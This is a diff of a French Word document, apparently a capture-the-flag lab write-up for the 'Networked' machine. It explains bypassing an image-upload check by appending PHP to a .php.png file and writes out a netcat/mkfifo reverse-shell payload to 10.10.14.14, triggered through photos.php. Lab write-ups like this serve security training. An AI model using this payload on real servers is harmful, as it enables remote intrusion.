--- a/Facile/[easy] Networked.docx
+++ b/Facile/[easy] Networked.docx
@@ -311,6 +311,7 @@
               <w:t>"</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:cstheme="minorHAnsi"/>
@@ -319,6 +320,7 @@
               <w:t>php,html</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -778,7 +780,524 @@
       <w:r>
         <w:t xml:space="preserve"> qu’il faut analyser pour trouver des informations en plus.</w:t>
       </w:r>
-    </w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Après une longue recherche, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">il y a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">une fonction </w:t>
+      </w:r>
+      <w:r>
+        <w:t>intéressante</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file_mime_type</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> qui vérifie le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>magic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> bytes du fichier pour savoir si c’est une image ou non</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> et une vérification sur la taille de l’image</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B66115" wp14:editId="01D287E2">
+            <wp:extent cx="5760720" cy="1890395"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="Image 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1890395"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Avec cette information, nous pouvons créer une image avec du code </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (pour avoir un reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>echo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>&lt;?</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>npassthru</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>("</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>rm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f ;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>mkfifo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f ;cat /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.14 4567 &gt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f") ;\n ?&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &gt;&gt; black.php.png</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Après avoir upload, on se rend sur la page </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://10.10.10.146/photos.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> pour déclencher le reverse shell et nous avons un shell </w:t>
+      </w:r>
+      <w:r>
+        <w:t>en tant qu’apache</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62132F30" wp14:editId="6C4BA590">
+            <wp:extent cx="4323580" cy="1322524"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="9" name="Image 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4354256" cy="1331907"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Le seul utilisateur sur la machine est </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>guly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DCC043D" wp14:editId="6C8D6C45">
+            <wp:extent cx="1374243" cy="503649"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Image 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1394689" cy="511142"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">En se rendant dans son dossier, nous voyons deux fichiers intéressants : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63AE6BB1" wp14:editId="35664D9A">
+            <wp:extent cx="3867150" cy="1295400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Image 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3867150" cy="1295400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Le fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>crontab.guly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> montre que le fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>check_attack.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> est exécuté toutes les 3 minutes :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C16E0D7" wp14:editId="35754880">
+            <wp:extent cx="3409180" cy="542012"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="12" name="Image 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3500475" cy="556527"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p/>
     <w:p/>
     <w:p/>
